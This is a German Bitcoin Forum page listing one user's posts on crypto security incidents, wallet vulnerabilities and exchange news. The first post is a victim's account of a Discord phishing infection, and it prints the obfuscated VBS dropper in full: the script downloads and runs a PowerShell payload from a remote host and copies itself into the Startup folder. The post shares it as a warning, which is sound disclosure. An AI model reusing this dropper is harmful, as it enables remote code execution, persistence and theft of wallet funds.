Bitcoin Forum
June 15, 2021, 06:26:26 PM *
News: Latest Bitcoin Core release: 0.21.1 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1] 2
1  Local / Altcoins (Deutsch) / [warnendes Beispiel] gehacked Discord DM Fake Internetseite und eigene Dummheit on: May 17, 2021, 11:05:31 AM
So mal ein kleiner Erfahrungsbericht als warnendes Beispiel, wobei viele sicher vorsichtiger sind als ich.

In einem Moment der Unachtsamkeit am 27.04, habe ich eine DM in Discord mit einer Nachricht aus dem Avalanche Announcements verwechselt. Irgendwie habe ich da einen 5 Min Aussetzer gehabt oder war nicht bei der Sache/abgelenkt.



Die Seite sah "vertrauenswürdig" aus, das Zertifikat hat auch gepasst, und so wollte ich mir die App ansehen. Datei runtergeladen, beim Installationsversuch eine Warnung erhalten und diese ignoriert.  Cry

Schnell wurde mir klar, dass ich scheisse gebaut habe. Im Avalanche Discord kamen auch schon die ersten Meldungen und Warnungen, dass auch andere Nutzer diese Nachricht bekommen haben und dies ein Scam ist.
Ich habe dann gleich wieder alles deinstalliert und auch den Virenscanner nochmal explizit drüber laufen lassen und auch eine .vbs aus dem Autostart gefischt.

Dachte, damit hat es sicher erledigt.

Dem war leider nicht so. Am 15.05 wollte ich mal wieder nach meinen PCL schauen, und musste feststellen, dass alle PCL und ein paar ETH Krümel von meinem Konto abgezogen wurden.
Als ich auf die ETH Adresse geschaut habe, sah ich dann noch andere Token von mir dort, nämlich ein paar Auctus
https://etherscan.io/address/0x827b0668dfe17e42727bac902526cf6676c24a79

Nach weiter Prüfung fand ich noch ein drittes Account das leer war, dort wurden aber nur die verblieben ETH abgezogen, da die Token nichts wert waren.
Am 10.05 hatte der Angreifer die ETH dann abgezogen [/url=https://etherscan.io/address/0xc9ddd5bd26f9a1260e6f24d0644c140c390c8a08]. Das [url=http://Konto]Konto, auf welches meine funds abgezogen wurden gibt es übrigens schon seit 2018  Embarrassed und es gibt da leider über 500 Transaktionen...

Da ich nicht wusste wie und wo der Angreifer Zugriff bekommen konnte habe ich dann angefangen zu suchen. Schnell wurde klar, dass es zeitlich genau mit der DM und meiner bullshit Aktion passte.
Ich habe dann nochmals genauer meinen PC geprüft und musste feststellen, dass am 14.05 eine Tevvvvvst.vbs von der Antivirensoftware aus meinem Autostart gezogen wurde. Leider wurde sie dort immer wieder hin kopiert. Der Angreifer hatte also immer noch Zugang... (ich habe später übrigens noch eine .vbs mit dem selben Inhalt gefunden, was wohl die Kopiervorlage aber mit anderem namen war...)

Code:
Set vvvvvvvvvvvvvvnnnnnnnnnnnnnn = CreateObject("WScript.Shell")


ddddddddddddddddddddd="cmd.exe /c"
qqqaaaaaaaaaazzzzzzzzzz = StrReverse(" l"+"le"+"hs"+"re"+"wo"+"P")



   vvvvvvvvvvvvvvnnnnnnnnnnnnnn.Run(ddddddddddddddddddddd+qqqaaaaaaaaaazzzzzzzzzz+"  Inv"+"oke-Exp"+"res"+"sion((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'Webc'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('h t t p s ://zapper.ws/test.jpg'))));exit "), CONSOLE_HIDE, CMD_WAIT
Set vvvvvvvvvvvvvvnnnnnnnnnnnnnn = Nothing
WScript.Sleep (60000)
on error resume next
Const ssfSTARTUP = &H7
Set fso=CreateObject("Scripting.FileSystemObject")
Set oShell = CreateObject("Shell.Application")
Set startupFolder = oShell.NameSpace(ssfSTARTUP)
currentPath = fso.GetAbsolutePathName(wscript.scriptfullname)
If Not startupFolder Is Nothing Then
st1="."
st2="v"+"b"
st3="s"
fso.CopyFile currentPath, startupFolder.Self.Path & "\Tevvvvvst" + st1 + st2 + st3
End If

WScript.Quit()

Ein geo nslookup auf h t t p s ://zapper.ws/test.jpg führt zu Servern auf den Sychellen.
Quote
IP General InformationIP Address:185.212.130.65Hostname:185.212.130.65ISP:Internet It Company IncIP Geolocation InformationContinent:Africa (AF)Country:Seychelles (SC) SC

Die Dateien auf zapper.ws gehören vermutlich zu irgendwelchen exploit kits.... Roll Eyes

Die Frage war nur wie er die Konten leer räumen konnte... Hatte er Zugriff auf mein Metamask, oder gar Zugriff auf mein Keepass. Liefen vielleich key- oder screen logger mit...Da kommt dann schon leicht "Panik" auf. Ich habe lange gesucht und folgendes Muster gefunden....

Die drei Konten die leer geräumt waren, hatte ich alle vor langer Zeit mal im Ethereum Wallet "Mist". Ich hatte darin noch mehrere Konten, aber auf einigen waren einfach nur Token ohne ETH, so dass keine Sende-Gebühren bezahlt werden konnten. Und die verschlüsselten .json Dateien lagen ebenfalls auf meinem PC. Die Passwörter für die Dateien sind aber 14-15 Zeichen mit Zahlen, Groß-Kleinschreibung und Sonderzeichen das schafft man weder mit bruteforce noch mit rainbow table in der kurzen Zeit. Also musste der Angreifer anderweitig Zugriff bekommen haben...

Ich habe dann zunächst mal meinen Windows 10 PC neu aufgesetzt neues Keepass Dateien und Metamask Dateien erstellt und meinem Portfolio nach neue Konten erstellt, die Funds überwiesen und wieder restaked, z.B. XTZ und Waves. Auch alle verblieben (nennenswerten) ehml. Mist ETH Token habe ich auf neue Konten verschoben. Bei der Diskussion mit unserem ChefImGartenPavillion (nochmal danke für die Zeit und Unterstützung!) bin ich dann auf folgendes Paper gestoßen:
https://www.researchgate.net/publication/337610456_Attainable_Hacks_on_Keystore_Files_in_Ethereum_Wallets-A_Systematic_Analysis

Dort gibt es folgende Passage:
Quote
There is no encryption applied to the keystore file and it is stored in a plaintext file with content in JSON format. Any malicious user who has access to the Ethereum wallet file directory, can steal this file and use hashcat to crack its password.

Nachdem ich das geprüft habe, war es tatsächlich so, dass ich noch diese alten keystore files auf meiner hdd hatte. Und soweit ich das paper richtig verstanden habe, kann man wohl mit Zugriff auf die keystores mit hashcat auch die Konten auslesen...

Es sind natürlich alles Annahmen und ich hoffe, das ich richtig liege und nicht noch mehr kommt. Gerade meine AVAX sind noch ein paar Tage im Staking bevor ich sie auf ein neues Konto transferieren kann.
Aber die Moral von der Geschichte ist: -> nicht blöd sein  Cheesy -> Hardware Wallet und falls nicht -> Keepass, keystores und .json Datein möglichst nicht auf dem PC halten, dann lieber extern mit entsprechenden Sicherungen.

Abgesehen von der tagelangen Arbeit und den schlaflosen Nächten, hat mich das ca. ~$17.000 USD Lehrgeld gekostet. Ich muss mal sehen, ob ich noch zur Polizei gehe. Meinen PC habe ich ja neu aufgesetzt und damit die "Spuren" verwischt, ein Image etc. war mir zu aufwendig, ich hatte andere Prioritäten. Bei der Adresse die es seit 2018 gibt, sind auch einige withdraws von Binance, Huobi und anderen Börsen, vielleicht schreibe ich die noch an, aber ob da was raus kommt. Bei etherscan.io wollte ich die Adresse melden, aber die wollen irgendwelche Screenshots von Phisihing Seiten, das war bei mir ja nicht nötig Tongue

Falls nochmal was (weg) kommt melde ich mich wieder Tongue


2  Local / Altcoins (Deutsch) / Radix Sale Update & Liquidity Mining Rewards on: October 15, 2020, 02:04:11 PM
Ich mache jetzt einfach einen neuen Faden auf, ich denke das sprengt den HotCoins sonst zu sehr...
Gerade kam ein Update reingeflattert, in welchem Piers Ridyard verkündet, dass es zunächst keine traditionelle Exchange geben wird, und statt dessen ein Liquidity Mining Reward Programm von 200 Millionen XRD.
Sie wollen in den nächsten 6 Monate vor dem Mainnet Launch der Community die Chance geben, auf DEFI Plattformen wie UNISWAP etc. einen sekundär Markt zu erstellen.

Bin noch unentschlossen, was ich davon halten soll Huh
Einerseits sicher "nett" andererseits entziehen sie sich halt damit einem Listing, das dürfte für "Diskussionen" sorgen... Und das mitten im Sale, alle die den KYC abgeschlossen haben, habe keine Chance mehr, bei denen der KYC noch offen ist, die könnten noch abspringen.

Quote
I want to give you a quick update on the Radix token sale and our plans for supporting the secondary market for the XRD token.

We now have approximately one thousand participants in the Radix sale with more joining each day. We have hit our soft internal targets and have decided to end the sale Thursday, October 22nd.

We have opted not to initially list the XRD token on traditional exchanges, although we have many exchanges interested in doing so. Instead, we wanted our community to have the chance to create markets on DEFI platforms like Uniswap. To support this effort and to help create a robust secondary market between now and launch of Radix mainnet in approximately six months, we are allocating 200 Million XRD tokens to be rewarded through liquidity mining.

This means anyone who wants to participate can earn RDX tokens simply by providing liquidity or joining a liquidity mining pool. Rewards are structured so that they compound, meaning the sooner you start mining and the longer you mine, the higher proportional % of tokens you receive.

To begin liquidity mining you have to own Radix tokens. This means that participants in the sale will be at an immediate advantage as they will own tokens prior to the market opening and will not have to buy tokens on the market to participate in mining rewards. Due to our tiered-price vesting, only 1% of all purchased tokens will be released in the first week of distribution. Supply-side economics suggests this will lead to some healthy volatility in the markets in the first weeks and months, heading into our mainnet launch.

For Radix token holders volatility is good, as tokens are only released as each price tier is met.  As each price tier is met, Radix market cap increases exponentially, in a way which may garner much attention. We would like to see a market with a stable price above the highest vested price tier by the launch of the Radix mainnet.

For more information about the mining incentives please join our community discussion on Telegram and our new Discord channel.

If you would like to secure your XRD tokens before our token sale closes, you can do that by registering on our token portal at: radixtokens.com before October 22.

Thank you,

Piers Ridyard
CEO of Radix DLT
3  Local / Altcoins (Deutsch) / Sicherheitslücke Trezor bei physikalischen Zugriff on: January 31, 2020, 03:33:15 PM
Mal wieder gibt es eine Sicherheitslücke, diese ist "nur" nutzbar, wenn physikalischer Zugriff besteht. Allerdings scheint dies mit einfachen und günstigen Mitteln realisierbar, und kann wohl auch nicht ohne Weiteres durch ein Update behoben werden. Bin gespannt, was Trezor dazu meint, das Kraken Security research team ist jedenfalls der Ansicht, dass Ledger ein "Hardware Redesign" machen muss.

Quote
According to Kraken Security Labs, breaking into a Trezor wallet is possible through the usage of cheap equipment. By conducting a voltage glitch-based attack, hackers can extract keys from the wallet and therefore withdraw funds from it.

“This attack relies on voltage glitching to extract an encrypted seed. This initial research required some know-how and several hundred dollars of equipment, but we estimate that we (or criminals) could mass produce a consumer-friendly glitching device that could be sold for about $75,” the team explained.

https://www.newsbtc.com/2020/01/31/bitcoin-investors-be-aware-kraken-finds-way-to-hack-into-trezor-hardware-wallets/

Ich habe nen neuen Faden aufgemacht, weil ich ad hoc keinen Alten passenden finden konnte, dies soll auch keine Panikmache sein, es soll lediglich darauf hinweisen, damit sich niemand in trügerischer Sicherheit wähnt.  Roll Eyes
4  Local / Altcoins (Deutsch) / Blockchain Denial of Service (BDoS ) günstigerer Angriff als 51% Attacke on: December 18, 2019, 07:58:28 AM
Hier mal wieder etwas Technisches, um sich vom Trauerspiel der Kurse abzulenken  Roll Eyes

Ich bin leider nicht so tief drin, um das Potential beurteilen zu können, was ich mich aber Frage ist, wie es denn sein kann, dass zunächst nur der Header ohne vollständigen Block übertragen und akzeptiert werden kann, das scheint schon sehr tiefe Eingriffe zu benötigen. Das hört sich ein bisschen so an, als müsste man "Pakete aufteilen", und dann stellt sich schon wieder die Frage, warum unvollständige Paket überhaupt akzeptiert werden, bzw. wie groß die Latenz sein darf, bis auch der zum Header dazugehörige Block (vollständig?) da ist.

Aber hier mal der Artikel einfachheitshalber mit Hilfe von DeepL übersetzt. Die Bilder sind aus dem Coinspice.com Artikel. Das Paper ist unten verlinkt.

Quote
Gestern gaben Forscher der Cornell University in Zusammenarbeit mit der Initiative for Cryptocurrencies & Contracts (IC3) bekannt: "Wir haben einen Denial-of-Service-Angriff auf bitcoinähnliche Blockketten entdeckt, der viel billiger ist als die zuvor beschriebenen Angriffe. Solche Blockketten beruhen auf Anreizen zur Gewährleistung der Sicherheit. Wir zeigen, wie ein Angreifer diese Anreize unterbrechen kann, damit rationale Miner das Mining einstellen." Sie nennen es eine Blockchain Denial of Service (BDoS).

Die inhärenten Eigenschaften des Nakamoto-Protokolls setzen dieses deutlich billigeren DoS-Angriffen aus.

Tatsächlich untersuchten die Forscher den historischen Haschkrieg von 2018, der zu einem umstrittenen Hardfork und Spaltung führte. "Die Blockchain-Sicherheit wird nur dann gewährleistet, wenn sich der Großteil der Rechenleistung im System angemessen verhält", stellte ein Forscher fest. "Ein DoS-Angriff könnte daher von einem Angreifer mit mehr Rechenleistung ausgeführt werden als alle anderen Teilnehmer zusammen, alias ein 51% Angriff. Für große Kryptowährungen sind 51% Angriffe für die meisten Entitäten unerschwinglich teuer", zitiert er das Beispiel Bitcoin Cash (BCH) Ende letzten Jahres.



"Wir stellen fest, dass die inhärenten Eigenschaften von Nakamotos Protokoll es deutlich billigeren DoS-Angriffen aussetzen", behaupten sie und nutzen die viel-gerühmten wirtschaftlichen Anreize, die in das Design integriert sind. "Wenn diese Anreize nicht mehr darauf ausgerichtet sind, gutes Verhalten zu fördern, ist das System in Gefahr. Unser Angriff, genannt Blockchain DoS (BDoS), nutzt die Rationalität der Miner aus, indem er ihnen einen höheren Gewinn für das Spielen gegen das System einräumt als für das Befolgen seiner Regeln", betonten Forscher.

Sie zitieren die Arbeit von Bryan Ford und Rainer Böhme und ihre "Analyse eines Systems in Bezug auf rationale Agenten ist von begrenztem Nutzen, aufgrund exogener Anreize, die sich nicht vom byzantinischen Verhalten unterscheiden", ein Problem, von dem angenommen wurde, dass Bitcoin es fast per Definition gelöst hat.

Blockchain Denial of Service: Der einzige gewinnende Zug ist, nicht zu spielen.

Der Angreifer erzeugt einen Block und veröffentlicht seinen Header und nur seinen Header", was drei Alternativen für rationale Miner bietet: die Kette verlängern, während er den Header ignoriert, den Blockheader verlängern oder ganz anhalten, um die laufenden und sinnlosen Energiekosten zu senken.



Der BDoS-Angriff, so die Forscher, steht nicht unmittelbar bevor. Dennoch glauben sie, dass es "eine Bedrohung für die Blockketten des Nakamoto-Konsenses ist, da es Denial-of-Service mit einer viel geringeren Hash-Rate als frühere Angriffe ermöglicht". Und ohne auf sein Potenzial einzugehen, behauptet das Papier: "Die Lebensfähigkeit der Nakamoto-Blockketten beruht auf der Bereitschaft der Miner, dem Protokoll trotz Einkommensverlust zu folgen - also auf Altruismus".

Übersetzt mit www.DeepL.com/Translator (kostenlose Version)

https://coinspice.io/news/researchers-claim-novel-bdos-stops-bitcoin-based-blockhains-with-far-less-than-a-51-attack/
https://arxiv.org/ftp/arxiv/papers/1912/1912.07497.pdf

5  Local / Altcoins (Deutsch) / Achtung: Android StrandHogg Sicherheitslücke on: December 04, 2019, 08:00:49 AM
Der Heise Artikel ist etwas "nüchterner" und macht nicht soviel Panik wie der cointelegraph. Da aber im Cryptobereich immer gilt je mehr Sicherheit desto besser, sollte man wenigstens davon gehört haben, vor allem, wenn man auch Wallets oder Börsen Apps auf seinem Android Smartphone hat. F2A erschwert den Zugang sicherlich, ist aber kein Garant.

Quote
Voraussetzungen für Attacke

Eine Attacke ist aber nicht ohne Weiteres möglich und es muss sich bereits Schadcode auf Geräten befinden. In Google Play soll es legitime Apps gegeben haben, die diesen Schadcode als Zusatzmodul mitbringen, führen die Sicherheitsforscher in einer Meldung aus. Welche Apps das im Detail sind, steht dort aber nicht. Google soll sie bereits offline genommen haben. Die Sicherheitsforscher gehen aber davon aus, dass solche "Dropper Apps" jederzeit wieder in Google Play auftauchen könnten.

...

Was passiert?

Öffnet ein Anbieter eine legitime App, soll sich der Schadcode im Multitasking-System dazwischenschalten können und so als legitime App getarnt Berechtigungen einfordern. So könnten Angreifer beispielsweise Zugriff auf die Kamera bekommen und das Opfer ahnt wegen dem Tarnmantel der legitimen App nicht Böses. Alternativ könnten Angreifer über diesen Weg auch Log-in-Bildschirme ersetzen und so Zugangsdaten über eigene Phishing-Formulare abfangen. Promon gibt an, konkrete Beweise zu haben, dass Angreifer das bereits aktiv ausnutzen.

https://www.heise.de/security/meldung/StrandHogg-Fehler-im-Multitasking-von-Android-koennte-Malware-Tuer-und-Tor-oeffnen-4603005.html
https://cointelegraph.com/news/report-android-vulnerability-allows-hackers-to-steal-crypto-wallet-info

Und noch die original Meldung von promon
https://promon.co/security-news/strandhogg/

Quote
Demonstrative of the scale of Google Play’s issue with dropper apps, researchers recently reported that the malicious CamScanner app, a PDF creator which contains a malicious module, has been downloaded more than 100 million times.

Dropper apps / hostile downloaders: These are apps that either have or pretend to have the functionality of popular apps, such as games and utilities, but they also install additional apps to a device that can be malicious, or steal your data.

In diesem Sinne, bleibt wachsam und vor Schaden behütet.
6  Local / Altcoins (Deutsch) / Dune der Tezos Fork on: October 18, 2019, 07:45:08 PM
Glaube es wird zeit einen Dune Faden aufzumachen...

wurde grade bei TZScan darauf aufmerksam gemacht, dass es TZScan nicht mehr gibt, und statt dessen DunScan fortgeführt wird. Vor allem bei den Tezos Hodlern ist derzeit noch etwas Skepsis verbreitet, da man seinen Tezos Seed bei Dune eingeben muss. Davon muss man ganz klar abraten, was aber die meisten derzeit noch scheuen ist, die Tezos auf eine neue Adresse zu schicken und neu zu delegieren, da kann es auch passieren, dass man nicht mehr bei seinem "lieblings Bäcker" rein kommt. Danach könnte man allerdings ohne Gefahr den Tezos Seed auf dessen Adresse KEINE Tezos mehr liegen bei Dune eingeben.

Quote
TzScan is dead, long live DunScan !
Two years ago, the OCamlPro team started working on a block explorer for Tezos: it was the first days of TzScan, that would be publicly released a few months later. For 2 years, it has been the most popular block explorer on Tezos, and we are quite proud of it. Many members of the Tezos community have been witnesses of our commitment to always improve TzScan to better fit the needs of its users.

This week, after the quorum for the Babylon amendment was reached, we decided that, with no funding to support the project anymore, we could not spend the time needed to update all our infrastructure. TzScan stopped working this morning. It’s always sad for a team when this happens.

But the adventure is not finished! TzScan still lives, thanks to the Dune Network, where it is running as the DunScan block explorer, thanks to the Dune Foundation and Origin Labs. DunScan already features some interesting improvements compared to TzScan: users can sign-in, bookmark accounts, and give accounts names that will appear everywhere. We are looking forward to give the same commitment to our new users in the Dune community!

Vielleicht wollt/könnt ihr einfach nochmal hier alles zusammen tragen, was bislang in Tezos und überwiegend HotCoins zum Thema Dune gepostet wurde.

Nicht schön, aber vielleicht kann man hier die Infos rund um Dune sammeln, falls jemand sich die Mühe machen möchte einen neuen, schöneren und besser struktuierteren Faden zu erstellen, bitte gerne!
ich würde diesen wieder löschen  Wink

englischer Faden:
und den seit November seit 04. November
https://bitcointalk.org/index.php?topic=5205855.0

7  Local / Altcoins (Deutsch) / [Hinweis] MakerDAO kritische Verwundbarkeit im Voting Contract on: May 07, 2019, 06:04:07 AM
Die MKR sind sicher, und es sind nur ~190 Adressen betroffen, welche MKR im aktuellen MakerDAO "Governance Voting Contract" haben.
Den Betroffenen wird dringen empfholen ihre MKR aus dem alten Contract abzuziehen und in die eigene Wallet "abzuziehen".

Quote
Critical Update to Governance Voting Contract

In partnership with Coinbase and Zeppelin, the Maker Foundation has been participating in a second round of audits of the Maker Voting Contract. During this process, we discovered the need to make a critical update.

You are not in danger of losing your MKR if you own one of the ~190 addresses who have staked MKR in the current MakerDAO Governance Voting Contract, but you are advised to move your MKR out of the old contract and back into your personal wallet immediately.

This can be done quickly and easily by following the instructions that can be found at migrate.makerdao.com.

If you have not participated in the voting portal with your MKR, no action is required.

The Maker Foundation is committed to ensuring everybody has a seamless experience making this shift, so please join us in our chat at #help. Support will be standing by to help anyone having issues or problems with transferring your MKR.

**Please note: This does NOT impact the security or stability of the MKR token, it is only relevant to those who are using the old voting contract. **

We will provide a full debrief and detailed outline of the changes ASAP.

We would like to thank both Coinbase and Zeppelin for their strong commitment to due diligence and responsible disclosure as they worked with us to mitigate this issue.
Governance

The usual weekly cadence of Governance Polling and Executive Voting will be paused as we transition MKR holders to the new contract. Additional details will be discussed in the r/mkrgov subreddit and at the weekly governance call.

https://www.reddit.com/r/MakerDAO/comments/ble9j1/notice_critical_update_to_governance_voting/
https://blog.zeppelin.solutions/makerdao-critical-vulnerability-notice-d581b30c9b39
8  Local / Altcoins (Deutsch) / Level Crypto Exchange und Automated Market Making on: April 11, 2019, 06:18:25 AM
NOCHMAL HIER DER HINWEIS: WER JETZT JOINED UND DEN AMM ANWIRFT, ZAHLT AUTOMATISCH $5 USD

So mal wieder was neues, zumindest für unseren Bereich. Viele suchen nach entspanteren, automatisierten Anlagemöglichkeiten. Hier gibt es von fonds, über AI bis zu bots alles mögliche. Oft sind diese Anlage mit hohem Risiko verbunden, hier auch Grin Denn wir sind schließlich in Crypto.

Also warum mache ich deswegen dann dennoch einen Faden auf?

Auf die Seite gekommen bin ich, weil ich WillyWoo auf tweitter folge und er dort heute Werbung für gemacht hat. Er ist Advisor dort. Ok, eine weitere Exchange, ok, mit Zero Fees, ja, alles schön, aber, das wirklich interessant ist, das Automated Market Making, ein bot den betanken kann und der dann automatisch 24h traded.

Die haben gerade erst angefangen, und man kann in die Alpha eingeladen werden, wer mag, kann mir zwecks ref code auch ne PM schicken.

Hier ein 90 Sek Video
Invest in crypto with a secure wallet and commission-free trading. Become an Alpha tester. Get a $5 membership fee for life.
https://www.youtube.com/watch?v=1LpA_tJaepc#action=share

Hier ein paar Infos zu AMM incl. wp link
Quote
Automated Market Making (AMM) is our first automated strategy available to LVL members. Think of your AMM as a trading bot that trades funds on your behalf. Your AMM tracks the market price and offers to buy below market and sell above market, 24 hours a day. AMM's can be funded from your wallet, are fully automatic, and have only two settings to learn.

Your AMM creates value on LVL by providing liquidity for retail market orders. That's why we're launching AMM's as our first strategy. AMM's provide every user the opportunity to make LVL's marketplace more efficient, and make a potential profit along the way. And because markets start out inefficient, AMM's help reward early LVL members that create liquidity.
https://s3.amazonaws.com/bitsea-static/media/AMM.pdf

Das ganze ist gerade interessant wegen der 5$ Lifetime membership und weil WillyWo schon eine Hausnummer im CryptoSpace ist.
Klar muss man mit Advisories vorsichtig sein, aber ich kann's mal wieder nicht lassen  Roll Eyes

und noch der Link zur Website: https://lvl.co/  Tongue

So wie ich es verstehe könnte es so eine Art "gunbot" sein, der immer minimal über und unter dem letzten Preis kauft und verkauft.
gunbot link hier aus dem Forum
https://bitcointalk.org/index.php?topic=1715214.0
9  Local / Altcoins (Deutsch) / Vorsicht Coinomi Wallet mögliche CRITICAL Vulnerability on: February 27, 2019, 08:49:25 AM
Hallo zusammen,
bin gerade über den reddit Artikel gestolpert, in welchem ein User behauptet er habe aufgrund einer kritischen Lücke in der Wallet seine Funds verloren.
Was dran ist, weiss ich nicht und will auch keine Panik auslösen, aber man muss solche Vorfälle immer wieder zum Analss nehmen auf die Gefahren von solchen Diensten hinzuweisen.

Das Problem hier konkret ist, dass das Passwort bzw. seeds zwecks Rechschreibprüfung im Klartext an google gesendet wurde. Losgelöst von der Schuldzuweisung, ist das Ergebnis, dass die Funds unwiderruflich verloren sind, sofern die geschichte wahr ist.

Quote
To understand how catastrophic the security issue is, they simply take your crypto-currency wallet’s passphrases/seeds and spell check it by sending it remotely to Google servers in clear plain text!

Quote
Technical Analysis

I started going back in time and arranging the events. The only new thing that I did was installing and running Coinomi wallet so my first conclusion was that the unsigned version of the application had a backdoor.

I did further investigation and compared both the unsigned version of the setup file and the signed version. The only difference was they added digital signature to the main executable file and the Java file (the main application).

At that stage I thought that there is probably something suspicious about the application apart from having their main executable unsigned, so I started replicating what I did in a new virtual machine but this time I installed “Fiddler”. A software that allows you to monitor and debug HTTP/HTTPS traffic of all applications running on your machine.

I started monitoring the traffic by running Fiddler in the background and then started Coinomi wallet. The first thing I noticed is that Coinomi application starts downloading dictionary wordlist from the following web address:

https://redirector.gvt1.com/edgedl/chrome/dict/en-us-8-0.bdic


Then I clicked on restore wallet and pasted a random passphrase and suddenly the screen screamed SURPRISE MOTHER****** (boom puzzle solved!)

The WHOLE passphrase in plain-text is sent to googleapis.com a domain name owned by Google! It was sending it as a spelling check function! Here is sample of the screenshot of the HTTP request:

https://avoid-coinomi.com/files/coinomi_screenshot_1.png


To verify my findings I have uploaded a video for anyone who wants to test and replicate what I did:

https://avoid-coinomi.com/files/coinomi_http_traffic_video.mp4

https://www.reddit.com/r/CryptoCurrency/comments/av7gfi/warning_coinomi_wallet_critical_vulnerability/
10  Local / Altcoins (Deutsch) / Liqui macht dicht, withdraw noch die nächsten 30 Tagen möglich on: January 28, 2019, 09:34:14 AM
ich werde ihnen allerdings nicht nach weinen  Roll Eyes Immerhin kein Exit Scam  Grin
Quote
Sehr geehrte Benutzer,

Vor kurzem haben wir mit Freude die Änderung unserer Richtlinien bekannt gegeben. Wir haben Ihnen das Recht gegeben, zu entscheiden, ob Sie bei uns auf unserer Krypto Exchange Reise dabei sein wollen, indem Sie die Änderungen akzeptieren.

Zu unserem großen Bedauern ist Liqui nach diesem Schritt nicht mehr in der Lage, Liquidität für die verbleibenden Nutzer bereitzustellen. Wir sehen auch keinen wirtschaftlichen Sinn darin, Ihnen unsere Dienstleistungen anzubieten.

Wir wollen jedoch nicht dorthin zurückkehren, wo wir vor einem Monat waren. Daher haben wir beschlossen, alle Konten zu schließen und unsere Dienstleistungen einzustellen. Es brach uns das Herz, das zu tun.

Sie können Ihre digitalen Assets innerhalb von 30 Tagen nach dem Versand dieser Nachricht über unsere Website abheben. Wenn Sie seit der Ankündigung von Änderungen unserer Richtlinien keine delisted Digital Assets abgehoben haben, haben Sie auch noch weitere 30 Tage ab dem Datum des Versands dieser Nachricht.

Nach 30 Tagen können wir nicht garantieren, dass wir unsere Website pflegen werden. In diesem Fall werden alle Auszahlungen über unseren Support @liqui.freshdesk.com abgewickelt, bis der letzte Benutzer seine Vermögenswerte bei uns gespeichert hat. Beachten Sie, dass unsere Nutzungsbedingungen gelten, bis Sie Ihr Guthaben von mehr als Null in unseren Wallets haben. Wenn wir keine Dienstleistungen erbringen, können wir Ihre Vermögenswerte nicht kostenlos aufbewahren, so dass die Gebühr anfällt, wenn Sie nicht in Übereinstimmung mit unseren Nutzungsbedingungen abheben.

Wir sind vielleicht bald wieder da. Das hängt jedoch vom Markt ab, der sich seit 2017 deutlich verändert hat.

Wir wissen nicht, was wir sonst noch sagen sollen, aber sagen Sie danke, dass Sie die Kryptowährungsgemeinschaft und Ihr Vertrauen in uns unterstützt haben.

Wir wollen diese Botschaft mit dem Satz von Marianne Williamson beenden: "Jedes Ende ist ein neuer Anfang. Durch die Gnade Gottes können wir immer wieder von vorne anfangen."

Ihr Liqui-Team

Übersetzt mit www.DeepL.com/Translator


Originalnachricht
Quote
Dear Users,

Recently, we were happy to announce the change in our policies. We gave you the right to decide whether you want to be with us in our Crypto Exchange journey by accepting the changes.

Much to our regret, after this step Liqui is no longer able to provide liquidity for the Users left. We also do not see any economic point in providing you with our services.

However, we do not want to return to where we were a month ago. Hence, we decided to close all accounts and stop providing our services. It broke our hearts to do that.

You will be able to withdraw your Digital Assets through our website within 30 days after this message was sent. If you did not withdraw delisted Digital Assets since we announced changes in our policies, you will also have another 30 days from the date this message is sent.

After 30 days we cannot guarantee that we will be maintaining our website. In this case, all withdrawals will be processed through our support @liqui.freshdesk.com until the last user store his assets with us. Note that our Terms of Use will apply until you have your more than zero balance in our wallets. If we do not provide services we cannot store your assets for free, so the fee will apply if you fail to withdraw in accordance with our Terms of Use.

We may be back soon. However, that depends on the market which has significantly changed since 2017.

We do not know what else to say but say thank you for supporting the cryptocurrency community and your faith in us.

We want to finish this message by the phrase of Marianne Williamson - "Every ending is a new beginning. Through the grace of God, we can always start again."

Your Liqui Team
11  Local / Altcoins (Deutsch) / VORSICHT vor SMS on: December 27, 2018, 09:29:56 AM
habe gestern eine engl. SMS bekommen, in welcher mir ein Angebot gemacht wurde. Ich soll mich für nähere Details per Email an ...7@gmail.com wenden.
Weder weiß ich, wie die an meine Handynummer gekommen sind, noch wurde ein Bezug zu einem ICO oder ähnliches hergestellt, wo ich einen KYC gemacht habe.
Da derzeit der Trend der "feindlichen" Smartphoneübernahmen besteht, habe bei mir alle Alarmglocken geklingelt, und ich gebe es hier als Warnung einfach mal zum Besten.

Originaltext:
Quote
I have a Proposition for you. Kindly reply to my private email for futher details: ...7@gmail.com

Nummer und Email veröffentliche ich noch nicht, da ich noch keine Bestätigung habe. Ich habe jetzt mal ne SMS zurückgeschrieben und mitgeteilt, dass ich keine weiteren Info raus geben, bevor kein Betreff für die Anfrage benannt wurde.

Das ganze ist irgendwie komisch, denn wenn irgendein ICO gehackt wurde, hätten Sie sicher auch die Email.
Vielleicht will mir ja auch nur irgendwer etwas verkaufen, gut ist, dass bei uns der "SIM swap attack" nicht so ohne weiteres funktioniert, dennoch ist extremste Vorsicht geboten, da auch ein Verlust von irgendwelchen Google Konten oder F2A fatle Auswirkungen haben kann.

Fall's mir hier nur irgendwer etwas verkaufen möchte, schreibe ich es nochmal, aber ich habe so meine Zweifel...

Hier noch ein Artikel dazu....
https://de.cointelegraph.com/news/sim-swapping-how-hackers-stole-millions-worth-of-crypto-via-victims-telecoms-operator
12  Local / Altcoins (Deutsch) / WARNING: Liqui.io Possible Exitscam!? on: November 13, 2018, 02:48:58 PM
Achtung, falls ihr auf Liqui.io was haben solltet...

WARNING. Liqui.io is likely liquidating their customers assets though Bancor & Binance. Possible Exitscam!

Quote
Liqui.io has been delisting alot of their coins lately. Including some of their top 10 volume coins like BAT. Meanwhile they give customers just 15 days to withdraw after delisting (approx a month after announcement) to withdraw the coins. People that are on vacation / hodling / sick are likely to miss their announcements. It seems like this short announcement time has a reason:

Liqui already started to liquidate 300k USD++ assets!

Please DYOR and consider withdrawing your balances after you see these red flags!

Also, there are already lawyers busy on this case for some coins of wich one that lost 150k TKN.

Liqui's twitter announcing the delisted coins and withdrawal dates: https://twitter.com/Liqui_Exchange

Pissed customers losing funds: https://twitter.com/Liqui_Exchange/status/1053666561754574854

